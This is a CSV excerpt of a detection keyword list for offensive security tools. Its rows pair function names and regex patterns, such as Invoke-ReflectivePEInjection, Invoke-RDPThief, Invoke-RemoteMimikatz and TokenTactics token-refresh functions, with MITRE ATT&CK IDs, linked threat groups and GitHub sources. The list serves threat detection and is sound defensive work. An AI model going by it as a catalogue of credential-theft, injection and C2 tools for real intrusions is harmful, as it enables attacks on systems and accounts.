"*Invoke-PsUACme*",".{0,1000}Invoke\-PsUACme.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49398"
"*Invoke-PsUACme.ps1*",".{0,1000}Invoke\-PsUACme\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49399"
"*Invoke-PsUACme.ps1*",".{0,1000}Invoke\-PsUACme\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49400"
"*Invoke-PuttyCreds*",".{0,1000}Invoke\-PuttyCreds.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","49401"
"*Invoke-Pwds.ps1*",".{0,1000}Invoke\-Pwds\.ps1.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","49402"
"*Invoke-RBDC*",".{0,1000}Invoke\-RBDC.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49403"
"*Invoke-RBDC-over-DAVRPC*",".{0,1000}Invoke\-RBDC\-over\-DAVRPC.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49404"
"*Invoke-RDPThief *",".{0,1000}Invoke\-RDPThief\s.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","0","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","49406"
"*Invoke-RDPThief.ps1*",".{0,1000}Invoke\-RDPThief\.ps1.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","1","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","49407"
"*Invoke-RDPwrap.ps1*",".{0,1000}Invoke\-RDPwrap\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49408"
"*Invoke-ReadC2Output*",".{0,1000}Invoke\-ReadC2Output.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","1","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","49409"
"*Invoke-Recon *",".{0,1000}Invoke\-Recon\s.{0,1000}","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Discovery","https://github.com/gfoss/PSRecon","1","0","N/A","N/A","9","5","486","105","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z","49410"
"*invoke-reflectivedllinjection-ps1*",".{0,1000}invoke\-reflectivedllinjection\-ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49411"
"*InvokeReflectivePEInjection*",".{0,1000}InvokeReflectivePEInjection.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","49412"
"*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49413"
"*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-ReflectivePEInjection.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49414"
"*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","49415"
"*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49416"
"*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49417"
"*Invoke-ReflectivePEInjection*",".{0,1000}Invoke\-ReflectivePEInjection.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49418"
"*Invoke-ReflectivePEInjection.*",".{0,1000}Invoke\-ReflectivePEInjection\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49419"
"*Invoke-ReflectivePEInjection.ps1*",".{0,1000}Invoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","49420"
"*Invoke-ReflectivePEInjection.ps1*",".{0,1000}Invoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","49421"
"*Invoke-RefreshAzureAppTokens -ClientId * -ClientSecret *",".{0,1000}Invoke\-RefreshAzureAppTokens\s\-ClientId\s.{0,1000}\s\-ClientSecret\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49422"
"*Invoke-RefreshGraphTokens*",".{0,1000}Invoke\-RefreshGraphTokens.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Use a refresh token to obtain new access tokens","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49423"
"*Invoke-RefreshToAzureCoreManagementToken *",".{0,1000}Invoke\-RefreshToAzureCoreManagementToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49424"
"*Invoke-RefreshToAzureManagementToken *",".{0,1000}Invoke\-RefreshToAzureManagementToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49425"
"*Invoke-RefreshToDODMSGraphToken *",".{0,1000}Invoke\-RefreshToDODMSGraphToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49426"
"*Invoke-RefreshToGraphToken *",".{0,1000}Invoke\-RefreshToGraphToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49427"
"*Invoke-RefreshToMAMToken *",".{0,1000}Invoke\-RefreshToMAMToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49428"
"*Invoke-RefreshToMSGraphToken *",".{0,1000}Invoke\-RefreshToMSGraphToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49429"
"*Invoke-RefreshToMSGraphToken -domain -ClientId *",".{0,1000}Invoke\-RefreshToMSGraphToken\s\-domain\s\-ClientId\s.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","49430"
"*Invoke-RefreshToMSManageToken *",".{0,1000}Invoke\-RefreshToMSManageToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49431"
"*Invoke-RefreshToMSTeamsToken *",".{0,1000}Invoke\-RefreshToMSTeamsToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49432"
"*Invoke-RefreshToOfficeAppsToken *",".{0,1000}Invoke\-RefreshToOfficeAppsToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49433"
"*Invoke-RefreshToOfficeManagementToken *",".{0,1000}Invoke\-RefreshToOfficeManagementToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49434"
"*Invoke-RefreshToOneDriveToken *",".{0,1000}Invoke\-RefreshToOneDriveToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49435"
"*Invoke-RefreshToOutlookToken *",".{0,1000}Invoke\-RefreshToOutlookToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49436"
"*Invoke-RefreshToSharePointToken *",".{0,1000}Invoke\-RefreshToSharePointToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49437"
"*Invoke-RefreshToSharePointToken*",".{0,1000}Invoke\-RefreshToSharePointToken.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","49438"
"*Invoke-RefreshToSubstrateToken *",".{0,1000}Invoke\-RefreshToSubstrateToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49439"
"*Invoke-RefreshToToken *",".{0,1000}Invoke\-RefreshToToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49440"
"*Invoke-RefreshToYammerToken *",".{0,1000}Invoke\-RefreshToYammerToken\s.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","49441"
"*Invoke-Reg1c1de*",".{0,1000}Invoke\-Reg1c1de.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49442"
"*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49443"
"*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49444"
"*Invoke-RegistryAlwaysInstallElevatedCheck*",".{0,1000}Invoke\-RegistryAlwaysInstallElevatedCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49445"
"*Invoke-RemoteMimikatz*",".{0,1000}Invoke\-RemoteMimikatz.{0,1000}","offensive_tool_keyword","mimikatz","PowerShell Scripts focused on Post-Exploitation Capabilities","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","10","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","49446"
"*Invoke-RemoteScriptWithOutput*",".{0,1000}Invoke\-RemoteScriptWithOutput.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","49447"
"*Invoke-ResolverBackdoor*",".{0,1000}Invoke\-ResolverBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49448"
